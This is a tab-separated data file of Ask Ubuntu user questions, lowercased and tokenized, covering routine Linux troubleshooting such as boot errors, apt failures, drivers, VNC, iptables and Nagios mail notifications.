476507	how do i use x265 under ubuntu 14.04 ?	i see that h.265/hevc encoding is gathering momentum but still under current ubuntu ( 14.04 ) it seems not easy to start producing h.265 video streams . how should i go about using x265 , in a manner that integrates with ubuntu , to produce hevc video files under ubuntu 14.04 ? references : x265 hevc encoder : the commandline encoder x265 : videolan site
476508	why ubuntu server asks to insert a cd-rom when installed from pxe ?	i set up a pxe server which hosts both ubuntu desktop and ubuntu server . ubuntu desktop is installed successfully from pxe . ubuntu server seems to successfully load vmlinuz and initrd.gz , asks for the language , then the location , then the keyboard layout , and finally complains that it ca n't mount the cd-rom : the content of /var/lib/tftpboot/pxelinux.cfg/default is the following : default ubuntu-installer/amd64/boot-screens/vesamenu.c32 menu title ubuntu setup label ubuntu-14.04-desktop-amd64 menu label ubuntu-14.04-desktop-amd64 kernel ubuntu-14.04-desktop-amd64/vmlinuz.efi append initrd=ubuntu-14.04-desktop-amd64/initrd.lz root=/dev/nfs boot=casper netboot=nfs nfsroot=192.168.1.41 : /exports/ubuntu-14.04-desktop-amd64 splash -- label ubuntu-14.04-server-amd64 menu label ubuntu-14.04-server-amd64 kernel ubuntu-14.04-server-amd64/vmlinuz append initrd=ubuntu-14.04-server-amd64/initrd.gz root=/dev/nfs boot=install netboot=nfs nfsroot=192.168.1.41 : /exports/ubuntu-14.04-server-amd64 splash -- what explains the fact that it requests the cd-rom and how to avoid it ?
476511	ubuntu 12.04 lts no bootable device	i have toshiba laptop that was configured to dual boot ubuntu 12.04 lts and windows 8 . i shut down the computer and when i rebooted i get the following errors checking media = failed no bootable device - please restart not exactly sure what has happened and where to start to get systems up and running . any help is appreciated .
476512	printing off center or images offset after upgrade to 14.04 lts ( brother hl-2240 )	: ) i have a very frustrating problem with my brother hl-2240 under ubuntu 14.04 . bear in mind this was working perfectly under ubuntu 13.10 . in firefox , when i print a webpage , all of the images are off center and cut off , this is a big deal for my work . in google chrome , when i print a webpage , the page is off center , toward the right margin . in opera , when i print a webpage , all of the white areas within the margins are black , using a lot of toner . pdf opened in document viewer , prints off center . steps i have taken to troubleshoot : 1 ) playing with the printer settings , resetting to defaults , etc . 2 ) un-installing the brother driver and re-installing ( linux-brprinter-installer-2.0.0-1 from the brother website ) , which works perfectly in ubuntu 13.10 . i see a similar , un-answered question , here . hopefully this question provides some additional clarity to the matter . if anyone would like some additional detail because she or he is willing to help , please let me know . i can scan output from the printer to show you . thank you .
476515	getting an error when trying to update	i suspect my bad internet connection quitting during an update may have something to do with it , but i 'm not sure . the error message : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_multiverse_i18n_translation-en , e : the package lists or status file could not be parsed or opened .
476516	invalid partition table ?	i 'm trying to install ubuntu by usb device , i 've extracted the iso ubuntu image to a flash disk then i booted from the usb device but it keeps showing me this message `` invalid partition table '' , so can anyone helps me here please ?
476519	live usb works on win , problems on mac	soooo , i have a live usb , ubuntu 14.04 64-bit . i use it on pc 's at school and on my intel mac at home with plop bootloader , using plopkexec . i installed the live usb with unetbootin because the ubuntu installer kept crashing . persistence seems to work but on the mac none of my gnome themes work . the tweak-tool does n't change anything . help ?
476522	ls on home directory very slow	a while ago , i accidentally created hundreds of thousands of files in my home directory which i subsequently deleted . since then however , running ls in my home directory has been extremely slow ( taking tens of seconds to print ) . it has also been slow in other directories ( as in taking 1s to print ) and tab completion has been slow everywhere ( also tens of seconds ) . what might the problem be ? edit : as suggested in the comments , the output of the find ~/ -maxdepth 1 | wc is 67 and the output of df -h is /dev/sda2 74g 8.4g 62g 12 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 3.9g 12k 3.9g 1 % /dev tmpfs 795m 1.1m 794m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 3.9g 4.9m 3.9g 1 % /run/shm none 100m 52k 100m 1 % /run/user /dev/sda1 825g 408g 376g 53 % /home afs 8.6g 0 8.6g 0 % /afs /dev/sdb2 1.9t 584g 1.3t 32 % /media/sj1/researchdata1 /dev/sdc1 932g 409g 524g 44 % /media/sj1/researchdata2
476523	build command by concatenating string in bash	i have a bash script that builds a command-line in a string based on some parameters before executing it in one go . the parts that are concatenated to the command string are supposed to be separated by pipes to facilitate a `` streaming '' of data through each component . a very simplified example : # ! /bin/bash part1=gzip -c part2=some_other_command cmd= '' cat infile '' if [ ! `` $ part1 '' = `` '' ] then cmd+= '' | $ part1 '' fi if [ ! `` $ part2 '' = `` '' ] then cmd+= '' | $ part2 '' fi cmd+= '' > outfile '' # show command . it looks ok echo $ cmd # run the command . fails with pipes $ cmd for some reason the pipes do n't seem to work . when i run this script i get different error messages relating usually to the first part of the command ( before the first pipe ) . so my question is whether or not it is possible to build a command in this way , and what is the best way to do it ?
476524	picasa installed using wine is unable to access some ntfs partitions ?	recently i installed picasa in my ubuntu 14.04 using wine . after performing a wine configuration i was able to access all the images in the ntfs partitions on my hard disk . i performed wine configuration as said in why can an application installed using wine not access ntfs partitions ? . after 3 days , it became unable to access 2 ntfs partitions . but i can access 1 ntfs partition ( named e , see image below ) . as you can see in the screenshot , i am unable to expand both d and f. how can i fix this issue permanently ?
476525	how to make picasa image viewer my default image viewer ?	i installed picasa in my ubuntu 14.04 using wine some days ago . i want to make picasa image viewer as my default image viewer . so i tried this in the default applications , but i ca n't find an entry for picasa there . am pretty new to ubuntu . how can i make picasa my default image viewer ? also i need to include picasa image viewer in the 'open with ' option . how to do it too ?
476526	chrome not accepting us international with dead keys keyboard 14.04	using 14.04 with keyboard selected as 'us international with dead keys ' as my keyboard layout option , ( so that i may use characters from other languages ) and the system accepts text input as you would expect . chrome however fails to recognise what keyboard i have set in system settings , no dead key input is detected or used by chrome at all , frustratingly . i updated from m34 to version 36.0.1985.125 to no avail : (
476528	blank screen booting ubuntu 14.04 iso on 2011 macbook pro 17 ''	macbook pro ( 17-inch , late 2011 ) i 've tried booting from the official ubuntu-14.04 desktop iso , and i can get to the grub menu , however choosing either `` try ubuntu '' or `` install ubuntu '' results in a blank screen , indefinitely . one peculiar thing is that before the grub menu loads , i see the following message for about a second : could not open `` \eft\boot\fallback.efi '' : 14 error : file `` /boot/ '' not found . does anyone know how i can troubleshoot this issue ? it obviously seems to be video related , but i 'm not sure what 's causing it .
476529	ubuntu 14.04 mouse not working but detected	i have a razer imperator mouse that used to work just fine until yesterday . lsusb , xinput and dmesg all correctly list the mouse , but yet it does n't work . can anyone give some tips on how to debug this ? ubuntu 14.04 with everything up to date .
476530	visual boy advanced 1.7.2-6 on ubuntu 14.04	hello i am using ubuntu 14.04 with gnome flash back and with no luck i installed visual boy advanced 1.7.2-6 cause it has the cheats option but after installing it manually i just don’t have an icon in the menu under games and when i right click on the menu i still don’t see it under settings just wondering how to run it in terminal and or get the icon somewhere also i tried to install it visual boy advance in wine i don’t get anything it just says its loading then it goes away this would be an acceptable fix also and or also i would be happy with cheats for the new version of vba or vba-m
476531	recent system logins	how would i be able to find logs of recent login or usage activity on my desktop ? is there a script or place in ubuntu that holds data that tells you of recent logins from user , guest , or remote .
476539	fullscreen tearing in firefox flash video with amd catalyst drivers	since upgrading to linux mint 17 , every time i put a flash video into fullscreen it starts tearing up , then freezes after a couple seconds . this only happens when i have the proprietary amd drivers installed . i am currently running fglrx-updates from the driver manager , and have also tested this with fglrx and also the drivers from the amd homepage . i have also manually installed flash player from adobe , to no avail . any ideas ?
476541	ubuntu 14.04 unity-control-panel system settings not working properly	i am not able to see battery indicator on the main title bar . and when i go into system settings- > power section i 'm not able to see the settings which allows me to turn on/off this indicator . also something weird is happened with unity-control-panel when i click on details nothing opens up but then after i am not able to close the system settings . whenever i click on close system settings window disappears and reappears . please help i have tried removing and reinstalling unity-control-panel and ubuntu-desktop .
476546	write a bash which open firefox on every ten minute	is it possible to write an script which do a specific command every ten minute ? i do not know if this is a loop ? for example every ten minute delete a file name foo on the home directory ? or every ten minute open firefox . update : please how to do that with out cron i need bash script
476547	is there any windows 8.1 in my system with my ubuntu ?	i had successfully installed ubuntu 14.04 with windows 8.1 . but due to some problem , i had to re-install ubuntu . i put ubuntu bootable usb in system and selected `` erase ubuntu ans re-install ubuntu '' . then my ubuntu problem got solved but now it is not showing windows 8.1 in start-up . i want to check if i had removed my windows completely ? here is my 500gb hard disk output with lsblk command : name maj : min rm size ro type mountpoint sda 8:0 0 465.8g 0 disk ├─sda1 8:1 0 461.9g 0 part / ├─sda2 8:2 0 1k 0 part └─sda5 8:5 0 3.9g 0 part [ swap ] sr0 11:0 1 1024m 0 rom please check and tell is there windows on my any partitions of hard-disk ?
476549	error while setting android adt bundle and making it work	( before marking it as a dupe , please go through my question as it is something different and none of the questions i came across answered this ) i have been trying to install adt-bundle on my 64-bit ubuntu 12.04 lts operating system . i got the same error that many questions over the site answer : error while loading shared libraries : libstdc++.so.6 : can not open shared object file : no such file or directory and also the other error saying : ca n't fetch right adb-version . i fixed the error by running a set of commands in the following order sudo apt-get install libgl1-mesa-dri : i386 sudo apt-get install ia32-libs-multiarch : i386 sudo apt-get install ia32-libs-multiarch sudo apt-get install ia32-libs and i was relieved ! my error was gone and then i could start with my first android application . but when i restarted my computer , there was some problem in my graphics libraries . i guess that they were over written or something . problem in some x11 ( i have no knowledge of this , but could figure out that this file/library or something was missing or written by the above commands that i had run ) and this happened twice . so i had to undo those commands and then agian install xstart and get my graphics display back . so , now , how should i proceed with my installation , as again i have those errors back whith libstdc++.so.6 ca n't be shared and more . thanks .
476551	x11 can not write .iceauthority file on a vmhgfs partition	i am running ubuntu 12.04.4 in a virtual machine using vmware fusion . i changed my home folder so that it is shared with the host os . i.e . /home/ < user > is now mounted automatically at boot time by adding the following line in /etc/fstab : .host : / < user > /home/ < user > vmhgfs defaults , uid= < user > , gid= < user > 0 0 after making this change , i can not login anymore on my session as x11 complains about being unable to update the /home/ < user > /.iceauthority . i can rm the old file , recreate it , etc . but nothing will do . the .iceauthority-c file is created properly so this is not a permission issue on my home folder . my guess is that this particular file is created using exotic flags that this filesystem ignore/do not support and this leads to this failure . i found workaround which is creating a .gnomerc file in my home folder containing : export iceauthority= '' /tmp/.iceauthority- $ { user } '' ... but i would prefer to avoid using this work-around . i have two questions : a . is there a way to fix this issue permanently without relying on this workaround ? b. i think it may be related to the mount flags . what are the recommended flags to mount a home partition using vmhgfs ?
476553	how can i put fedora gui onto ubuntu ?	okay , i 'm pretty new to linux-based systems , so if i say something wrong or ask something dumb , please bear with me . i have a project for school that requires some extensive work inside of the latest version of fedora including screenshots of rather specific things . the vm system at my school runs fedora 20 like a snail high on paint fumes , and my laptop 's virtualbox does n't recognize the iso i got from the official fedora site , so i feel like i 'm out of alternatives aside from formatting over ubuntu . i 'd rather not do that , as i rather enjoy this distro . i am running ubuntu 14.04 on my laptop . at my login screen , i have the much appreciated option of selecting between a couple of gui 's -- specifically , ubuntu , gnome , and cinnamon . i would like to get the fedora gui added to this list , but i do n't know where to start or if it 's even an option . any and all help is appreciated .
476554	how to install ruby mine ubuntu	i have already install rvm . now i have download rubymine-6.3.2.tar.gz from here http : //www.jetbrains.com/ruby/download/ , but still i am confuse how can i install it on my system . i am using ubuntu 12.10 . please help me to do this . thanks
476555	how to run vnc server on ubuntu	i am trying to run vnc server on my remote machine and installed vnc server with the help of this link . i have done everything up to step 3 and am now trying step 4 , but in my machine i do not get : /etc/init.d/vncserver how do i run vnc server properly ?
476560	what is the best way to run own server side programs on ubuntu server	if i make some server side programs with node.js / java / python what is the best way to run them and make them run every time i boot my server . is crontab @ reboot valid way to do this . if so how do i start and stop those so i can modify code without having to reboot server ?
476561	configuration of tmux	how to configure tmux to get this theme render , please ? thanks in advance .
476563	can anyone tell me why the terminal is sending me this response ?	i am trying to flash 4.4.3 to my nexus 5 . when i enter this cd desktop/android i get this bash : cd : desktop/android : no such file or directory i am looking right at the folder on my desktop named `` android '' i tried the same command with other folders and i get the same error . can anyone tell me why or what i am doing wrong ? also ! here is the guide i am following
476570	is is necessary to do apt-get update everytime	i wonder if in debian flavours you should always do a update before apt-get install ? what are the disadvantages if i just install without updating ?
476572	difference in use between pwd and $ pwd	to print current/present working directory environment variable $ pwd and command pwd are available . so , what is difference in usage of both ? or what should be chose for specific purpose ?
476578	chrome dock icon looks blurry and low resolution	whenever i launch chrome my icon never looks right and i ca n't open new windows by right clicking and selecting . i am also using plank dock . here is a screenshot : idk if you guys can notice how the icon is n't hd , it 's all blurry .
476579	mobile partner install	i tried to install mobile partner on my ubuntu 14.04 but i got the linked result : installed version : 21.003.28.12.169 installing version : 21.003.28.12.169 the software is exist . do you want overwrite it ? ( [ y ] /n ) : y local path is : /usr/local/modile_partner installing modile partner ... chmod : can not access ‘/usr/local/modile_partner/config’ : no such file or directory usage : sudo -h | -k | -k | -v usage : sudo -v [ -akns ] [ -g group ] [ -h host ] [ -p prompt ] [ -u user ] usage : sudo -l [ -akns ] [ -g group ] [ -h host ] [ -p prompt ] [ -u user ] [ -u user ] [ command ] usage : sudo [ -abehknps ] [ -r role ] [ -t type ] [ -c num ] [ -g group ] [ -h host ] [ -p prompt ] [ -u user ] [ var=value ] [ -i|-s ] [ < command > ] usage : sudo -e [ -akns ] [ -r role ] [ -t type ] [ -c num ] [ -g group ] [ -h host ] [ -p prompt ] [ -u user ] file ... there is no sudo command in your system , you 'd better run the software by root press any key to continue ... sed : ca n't read mobilepartner.desktop : no such file or directory chmod : can not access ‘./driver/*’ : no such file or directory ./install : line 502 : ./driver/install : no such file or directory chmod : can not access ‘./sbin/*’ : no such file or directory chmod : can not access ‘./hw_pppd’ : no such file or directory chmod : can not access ‘./hw_pppd’ : no such file or directory ./install : line 518 : ./hw_pppd/sbin/install_pppd : no such file or directory cp : can not stat ‘./hw_pppd’ : no such file or directory cp : can not stat ‘/usr/local/modile_partner/qtlib/lib*.so*’ : no such file or directory grep : /usr/local/modile_partner/sysconfig.dat : no such file or directory grep : /usr/local/modile_partner/sysconfig.dat : no such file or directory cp : can not stat ‘/usr/local/modile_partner/sbin/67hw_hook’ : no such file or directory chmod : can not access ‘/etc/pm/sleep.d/67hw_hook’ : no such file or directory [ done ] finished , press any key to exit i tried to make chmod +x install but i got the same result .
476583	vnc server security	first , we need to make sure vnc server only listens on localhost . what is the meaning of this line will it listen remote connection when we onfigure it to listen localhost only ? recommended step - secure your vnc server session with encryption . a basic vnc server setup has no encryption , which makes it vulnerable to snooping . we will create an ssh tunnel with putty and connect to vnc via this tunnel . first , we need to make sure vnc server only listens on localhost . edit /etc/init.d/vncserver and add -localhost to options : i am not able to understand the meaning of this can someone explain options= '' -depth $ { depth } -geometry $ { geometry } : $ { display } -localhost ''
476589	format disk in 14.04	i remember using disk utility to format disks and usbs in 12.04 . now , after upgrading to ubuntu 14.04 , i ca n't seem to find the disk utility application . how do i format disks in 14.04 ? looking for applications that are installed by default to carry out this task
476593	unable to run 'sudo apt-get dist-upgrade ' due to authentication issues ( plesk repository )	i 've just attempted to run sudo apt-get dist-upgrade on my ubuntu box , but am getting the following error ... warning : the following packages can not be authenticated ! librdbmspp php5-ioncube-loader sw-libboost-date-time1.49.0 sw-libboost-system1.49.0 sw-libboost-filesystem1.49.0 sw-libboost-program-options1.49.0 sw-libboost-regex1.49.0 sw-libboost-serialization1.49.0 sw-libpoco i 've tried running ... $ sudo apt-key update $ sudo apt-get update ... as found in this question , but i 'm still getting the error . can anyone help , please ? update on 5th june repos currently in /etc/apt/sources.list : deb http : //gb.archive.ubuntu.com/ubuntu/ precise main restricted universe multiverse deb http : //gb.archive.ubuntu.com/ubuntu/ precise-updates main restricted universe multiverse deb http : //gb.archive.ubuntu.com/ubuntu precise-security main restricted universe multiverse deb http : //archive.canonical.com/ubuntu precise partner deb-src http : //archive.canonical.com/ubuntu precise partner deb http : //security.ubuntu.com/ubuntu precise-security main restricted universe multiverse deb-src http : //security.ubuntu.com/ubuntu precise-security main restricted universe multiverse deb http : //autoinstall.plesk.com/ubuntu/psa_11.5.30 precise all deb http : //autoinstall.plesk.com/debian/sitebuilder_11.5.10 all all deb http : //autoinstall.plesk.com/debian/billing_11.5.30 all all apt-get : reading package lists ... building dependency tree ... reading state information ... the following new packages will be installed : linux-headers-3.2.0-63 linux-headers-3.2.0-63-generic linux-image-3.2.0-63-generic the following packages will be upgraded : iproute libgnutls-dev libgnutls-openssl27 libgnutls26 libgnutls26 : i386 libgnutlsxx27 librdbmspp libssl-dev libssl-doc libssl1.0.0 libssl1.0.0 : i386 linux-generic linux-headers-generic linux-image-generic openssl php5-ioncube-loader sw-libboost-date-time1.49.0 sw-libboost-filesystem1.49.0 sw-libboost-program-options1.49.0 sw-libboost-regex1.49.0 sw-libboost-serialization1.49.0 sw-libboost-system1.49.0 sw-libpoco 23 upgraded , 3 newly installed , 0 to remove and 0 not upgraded . need to get 63.2 mb of archives . after this operation , 217 mb of additional disk space will be used . do you want to continue [ y/n ] ? warning : the following packages can not be authenticated ! librdbmspp php5-ioncube-loader sw-libboost-date-time1.49.0 sw-libboost-system1.49.0 sw-libboost-filesystem1.49.0 sw-libboost-program-options1.49.0 sw-libboost-regex1.49.0 sw-libboost-serialization1.49.0 sw-libpoco install these packages without verification [ y/n ] ? apt-cache policy librdbmspp : # apt-cache policy librdbmspp librdbmspp : installed : 2.0-735641.13060715 candidate : 2.0-735641.13073116 version table : 2.0-735641.13073116 0 500 http : //autoinstall.plesk.com/ubuntu/psa_11.5.30/ precise/all amd64 packages *** 2.0-735641.13060715 0 100 /var/lib/dpkg/status
476594	secure chat tunnel	i want to create a secure chat connection and tunnel trought ubuntu terminal or something like netcat ( nc -l 1234 ) but netcat is not encrypted . please help me
476596	openfire installation using openjava	openfire runs successfully with oracle java ( sun java ) without much of an issue on ubuntu os . however , ubuntu discontinued sun java ( oracle java ) from the repos and since then one has to install sun java using the terminal a little bit more than one would use when the sun java was in the repos . easiest method i have found is using webupd8team ppa and it works quite well . but to get that ppa i need to install python-software and add a key etc . which on a server i do n't want to ; given that i want to use only default canonical tested software ( like open java ) , reduce the number of 3rd party ppas etc . there are a few tutorials on the internet which i have tried , but none of them that i tried , are stable / scalable . i have more than 2,800 users in a corporate environment using empathy , pidgin , jitsi , mobile clients , web clients and users transferring files , doing audio / videoconferencing / chat conferencing on the server all the time . this server integrates with microsoft active directory 2008 as well for authentication . at any given point in time , there are more than 1,500 users who are online , 200 concurrent chats are happening , atleast 50 chat rooms are active . it also connects to 3 other openfire servers with different domains on the internet ( something like a federation service with the clients of my employer based out of nashville and munich ) has anyone tried using openjava for implementing openfire for this kind of load . i want to use a ubuntu 12.04.04 lts server edition , 64 bit on a dell r210 server with 8 gb ram . i am using 10.04 server edition as sun java was included in the repos . i am planning a migration mid july 2014 and i am keen to test the environment before i can migrate completely with openjava any help is appreciated . thanks
476597	serious errors were found while mounting disk drive for /	i have a problem after installing 14.04 64bit on my dell laptop . the error message is serious errors were found while mounting disk drive for /
476598	want to format ubutu 12.04 and install centos	i wish to format my ubuntu 12.04 lts and install centos 5 . can someone please guide me through the formatting process ? thanks
476602	m-audio delta starts up at wrong sample rate	when the pc starts my m-audio delta 66 is using 48000khz sampling rate when it is set for 44100 in envy24 . this causes audio to play slower than it should . this is in kubuntu 14.04 on my new pc using an amd a8 6500 with 8gb . when i first installed it seemed okay , but at some point it went wrong and has been doing this consistently since then . kernel is 3.13.0-24-generic # 47-ubuntu smp fri may 2 23:31:42 utc 2014 i686 athlon i686 gnu/linux steve @ slarti : ~ $ cat /proc/asound/card2/pcm0p/sub0/hw_params access : mmap_interleaved format : s32_le subformat : std channels : 10 rate : 48000 ( 48000/1 ) period_size : 441 buffer_size : 3528 i can get it to switch to 44100 if i disable/enable the delta in pulseaudio volume control , but i have to do this every day and the sound still seems distorted . i ca n't see any issues in any of the config or log files i can find . if i boot the pc with a mint live usb it starts at 44100 and sound fine . originally reported on youtube is playing at the wrong speed - maybe soundcard related , but i 'll close that and have this more relevant question instead .
476605	xtreme download manager weird behavior	just downloaded xtereme-download manger works fine but one problem when i am using facebook and and when there is sound of notification or chat the xtreme-download manger asks to download it 's audio and always disturb me .
476608	is ubuntu maas free ?	ubuntu maas , very cool , awesome in fact , looks like a unique tool for several jobs . it looks free , but part of its documentation starts already with clauses that would scare anyone with interest in it : documentation is copy righted by canonical ; documentation must be used only for non-commercial purposes ; if documentation is distributed within the non-commercial clause you must retain copyright ; it just sounds a lot for a guide on how to install maas + juju + openstack and that scares me a bit . why does documentation built from the community prevent me from doing anything except look at it ? we produce a guide , but i can not take it to work and look at it or show it as a possible tool that my company would be interested in using or contributing to ? my question is then : under what license is ubuntu maas distributed and what would be the reasoning for being so worried about copyrighting a simple guide like that so heavily ? is ubuntu maas free ?
476609	looking for dark , high contrast theme	i am looking for a dark , contrast theme . most dark , high-contrast themes i have tried do not give sufficient contrast to many edges , such as the edges of buttons , tabs , windows and other borders . could you recommend themes that would provide such features ? alternatively , could you recommend a guide to changing a fairly dark theme , such as numix-cyanogen , such that it would feature light button , tab , window and other borders ? roughly visually , what i mean is to from this : to something like this :
476613	sudo apt-get update problem 12.04	please guys help me to fix this issues with update my ubuntu 12.04 desktop : get:38 http : //us.archive.ubuntu.com precise/universe translation-en [ 3,341 kb ] fetched 24.5 mb in 7min 9s ( 57.1 kb/s ) w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/precise/main/i18n/index no hash entry in release file /var/lib/apt/lists/partial/extras.ubuntu.com_ubuntu_dists_precise_main_i18n_index e : some index files failed to download . they have been ignored , or old ones used instead .
476614	how to disable usb storage in ubuntu 13.10 ?	i want to block my all my usb mas storage and allow only devices like keyboard and mouse . i 'm able to do so by following the kb . but the issue is that when i connect devices like mobile phones & tabs , i 'm able to access the mass storage & able to copy & paste . disable usb mass storage kindly advise me how could i block these mobile storage devices . please note that i only want to block mass storage the other features like charging & android apk execution to mobile should work as usually . please help ...
476615	about free for user declaration	where is declared that ubuntu is free for users ? i mean officially declaration where ubuntu mention that desktop version is free to use , not commercial .
476617	multi-finger gestures in 14.04	i 'm running 14.04 on a lenovo y500 . i want to get multi-touch gestures running , specifically a three-finger swipe to switch desktops . i would like to keep using the unity interface , so i ca n't use touchegg , and i have a buttonless touchpad , so easystroke is not a good candidate either . is there another third party program that will allow me to use buttonless three finger gestures , or some config hack that will accomplish the same thing ?
476619	set default pulseaudio volume	when i reboot , the volume on the pulseaudio sinks is set to 100 % . i know how to change the volume using pactl set-sink-volume , but that is only set temporarily . i could write a script that is run at startup , but it will not be applied if i connect a sink later . ( i.e . a bluetooth speaker ) is there a config file where i can set the default volume that is given to a device when it is first loaded by pulseaudio ? or even the master volume at startup ? clarification : the application is for a headless linux box , so the system should n't have to be rebooted and should be able to accept new devices without having to connect via ssh to adjust volumes , etc .
476626	iptables issue ca n't ssh remote machines	i want to ssh to 192.168.1.15 server from my machine , my ip was 192.168.1.99 source destination was up , with ip 192.168.1.15 . this is lan network there are 30 machine 's connected to the network and working fine , i 'm playing around the local machine 's cos i need to apply the same rules in production vps i have applied the below iptables in my machine 192.168.1.99 , now i ca n't receive any packets from outside and i ca n't send any packets outside , while applying the below chain iptables -p input drop iptables -p output drop iptables -p forward drop after the above chain i have added the below rules and it want to allow ssh from machine to 192.168.1.15 to access the 192.164.1.15 but still i ca n't access 192.168.1.15 iptables -a input -p tcp -i eth0 -- dport 22 -m state -- state new , established -j accept iptables -a output -p tcp -o eth0 -- sport 22 -m state -- state established -j accept iptables -a output -o eth0 -p tcp -- dport 22 -m state -- state new , established -j accept iptables -a input -i eth0 -p tcp -- sport 22 -m state -- state established -j accept any one please check weather my rules are wrigt . still i ca n't access the machine 15
476629	kubuntu desktop icons disappearing on reboot	i recently installed kubuntu 14.04 . i have the desktop layout set as folder view and everything is fine , but sometimes when i reboot it shows this : so all i can see is a scrollbar and no icons . if i go to desktop settings and switch to another layout and then switch again to folder view everything is fine and the icons ( and the `` normal '' desktop ) reappear . this happens often when i reboot but not every time . any ideas ? thank you very much .
476630	serious error on first attempts to dual boot ubuntu 14.04 with win7	i downloaded ubuntu 14.04 from the website which i saved to my desktop with winrar . my trial with winrar had expired so i have now tried it with active @ isoburner but i 'm getting no further . i eventually got it burnt onto a dvd ( 4.7gb ) and tried to boot from dvd and normally . neither way works . it looks like its about to boot but then a message appears saying that a serious error has occurred ... the disk drive for /tmp is not ready yet or not present ... press i to ignore , s to skip or m for manual ... at this point i 'm lost and unsure what to do . my laptop toshiba equium a210-17i is over 5 or 6 years old . available space on the hard drive is 24gb . 2gb ram . it originally came with windows vista home premium edition but about a year ago or more a friend wiped it clean for me as i was having no end of problems with vista . he installed windows 7 ultimate ( which i do n't have a disc for ) . how can i resolve this issue and get ubuntu to boot up ? do i have to install a previous version of ubuntu first ? any advice or help would be greatly appreciated . kind regards . beetle .
476634	how to enable number keys in ubuntu 14.04 gnome	i have recently switched to gnome from unity and after doing so i have lost my number keys which are present at the right extremity of my keyboard is there any way to enable tham again
476636	switching from ubuntu to ubuntu server	i think this is may be a silly question but , i keep asking , i have ubuntu 12.04 which i have just upgraded to 14.04 using : apt-get install update-manager-core do-release-upgrade -- check-dist-upgrade-only -- devel-release i ' m running a web mail server on it which made me think of switching to ubuntu server for security issues . but i have two questions , first does it come with interface , i mean not only console , and second and the most important , can i do that from terminal or i have to format again and lose all my work ? .
476640	i do n't receive mail notification using nagios core 4	i have a problem with automatically mail notification in nagios core 4 installed on ubuntu 12.04 lts ( precise pangolin ) server ... i have tried to send mail with the nagios user and root user with the command : echo `` test '' | mail -s `` test mail '' support @ xxxx.eu and i received the mail correctly ... but i do n't receive any automatically mail notification . how can i resolve this issue ? these are my configuration files ( commands.cfg , contacts.cfg , nagios.log , mail.log ) : commands.cfg ( the path /usr/bin/mail is the right path ) # 'notify-host-by-email ' command definition define command { command_name notify-host-by-email command_line /usr/bin/printf `` % b '' `` ***** nagios *****\n\nnotification type : $ notificationtype $ \nhost : $ hostname $ \nstate : $ hoststate $ \naddress : $ hostaddress $ \ninfo : $ hostoutput $ \n\ndate/time : $ longdatetime $ \n '' | /usr/bin/mail -s `` ** $ notificationtype $ host alert : $ hostname $ is $ hoststate $ ** '' $ contactemail $ } # 'notify-service-by-email ' command definition define command { command_name notify-service-by-email command_line /usr/bin/printf `` % b '' `` ***** nagios *****\n\nnotification type : $ notificationtype $ \n\nservice : $ servicedesc $ \nhost : $ hostalias $ \naddress : $ hostaddress $ \nstate : $ servicestate $ \n\ndate/time : $ longdatetime $ \n\nadditional info : \n\n $ serviceoutput $ \n '' | /usr/bin/mail -s `` ** $ notificationtype $ service alert : $ hostalias $ / $ servicedesc $ is $ servicestate $ ** '' $ contactemail $ } # 'process-host-perfdata ' command definition define command { command_name process-host-perfdata command_line /usr/bin/printf `` % b '' `` $ lasthostcheck $ \t $ hostname $ \t $ hoststate $ \t $ hostattempt $ \t $ hoststatetype $ \t $ hostexecutiontime $ \t $ hostoutput $ \t $ hostperfdata $ \n '' > > /usr/local/nagios/var/host-perfdata.out } # 'process-service-perfdata ' command definition define command { command_name process-service-perfdata command_line /usr/bin/printf `` % b '' `` $ lastservicecheck $ \t $ hostname $ \t $ servicedesc $ \t $ servicestate $ \t $ serviceattempt $ \t $ servicestatetype $ \t $ serviceexecutiontime $ \t $ servicelatency $ \t $ serviceoutput $ \t $ serviceperfdata $ \n '' > > /usr/local/nagios/var/service-perfdata.out } contacts.cfg : define contact { contact_name supporto alias supporto clienti dea service_notification_period 24x7 host_notification_period 24x7 service_notification_options w , u , c , r host_notification_options d , r service_notification_commands notify-service-by-email host_notification_commands notify-host-by-email email supporto @ xxxx.eu } define contactgroup { contactgroup_name admins alias nagios administrators members supporto } nagios.log : [ 1401871412 ] service alert : fileserver ; current users ; ok ; soft ; 2 ; users ok - 1 users currently logged in [ 1401871953 ] service alert : backups ; nagios status ; warning ; soft ; 1 ; nagios warning : 36 processes , status log updated 541 seconds ago [ 1401872133 ] service alert : backups ; nagios status ; ok ; soft ; 2 ; nagios ok : 36 processes , status log updated 180 seconds ago [ 1401872321 ] service alert : posta ; swap usage ; critical ; soft ; 1 ; critical - plugin timed out after 10 seconds [ 1401872322 ] service alert : fileserver ; current users ; critical ; soft ; 1 ; critical - plugin timed out after 10 seconds [ 1401872420 ] service alert : archivio ; disk space ; critical ; soft ; 1 ; critical - plugin timed out after 10 seconds [ 1401872492 ] service alert : fileserver ; current users ; ok ; soft ; 2 ; users ok - 1 users currently logged in [ 1401872492 ] service alert : posta ; swap usage ; ok ; soft ; 2 ; swap ok : 100 % free ( 1984 mb out of 1984 mb ) [ 1401872590 ] service alert : archivio ; disk space ; ok ; soft ; 2 ; disk ok [ 1401872931 ] auto-save of retention data completed successfully . [ 1401873333 ] service alert : backups ; nagios status ; warning ; soft ; 1 ; nagios warning : 36 processes , status log updated 402 seconds ago [ 1401873513 ] service alert : backups ; nagios status ; ok ; soft ; 2 ; nagios ok : 36 processes , status log updated 180 seconds ago mail.log ( i think that the problem is here , but i do n't know how to resolve it . ) jun 4 10:00:01 backups sm-msp-queue [ 6109 ] : my unqualified host name ( backups ) unknown ; sleeping for retry jun 4 10:01:01 backups sm-msp-queue [ 6109 ] : unable to qualify my own domain name ( backups ) -- using short name jun 4 10:20:01 backups sm-msp-queue [ 7247 ] : my unqualified host name ( backups ) unknown ; sleeping for retry jun 4 10:21:01 backups sm-msp-queue [ 7247 ] : unable to qualify my own domain name ( backups ) -- using short name jun 4 10:40:01 backups sm-msp-queue [ 8327 ] : my unqualified host name ( backups ) unknown ; sleeping for retry jun 4 10:41:01 backups sm-msp-queue [ 8327 ] : unable to qualify my own domain name ( backups ) -- using short name jun 4 11:00:01 backups sm-msp-queue [ 9549 ] : my unqualified host name ( backups ) unknown ; sleeping for retry jun 4 11:01:01 backups sm-msp-queue [ 9549 ] : unable to qualify my own domain name ( backups ) 